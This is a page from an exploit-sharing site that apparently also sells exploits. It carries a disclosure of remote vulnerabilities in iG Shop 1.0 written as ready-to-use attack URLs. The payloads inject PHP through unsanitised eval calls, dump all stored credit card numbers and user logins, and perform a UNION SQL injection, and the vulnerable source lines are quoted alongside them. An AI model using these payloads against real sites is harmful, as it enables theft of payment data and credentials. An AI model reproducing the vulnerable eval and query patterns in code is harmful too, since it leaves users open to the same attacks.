0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
iG Shop 1.0 (eval/sql injection) Multiple Remote Vulnerabilities
================================================================ iG Shop 1.0 (eval/sql injection) Multiple Remote Vulnerabilities ================================================================ "If eval is the answer, then you are asking the wrong question." --Unknowen ig-shop suffers from two eval's that can be controlled by an attacker: http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();// ./cart.php line 692: eval ("cart_$action();"); http://127.0.0.1/ig_shop/page.php?action=;phpinfo();// ./page.php line 336: eval ("page_$action();"); Dumps all credit card numbers: http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders Some of these variables can be decoded using the unserlize() funciton. Dumps all logins: http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users sql injection works regardless of magic_quotes_gpc. http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201 ./compare_product.php line 11: $qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id]; Should have used quote marks. vendor's page:http://www.igeneric.co.uk/ By Michael Brooks. # 0day.today [2024-12-23] #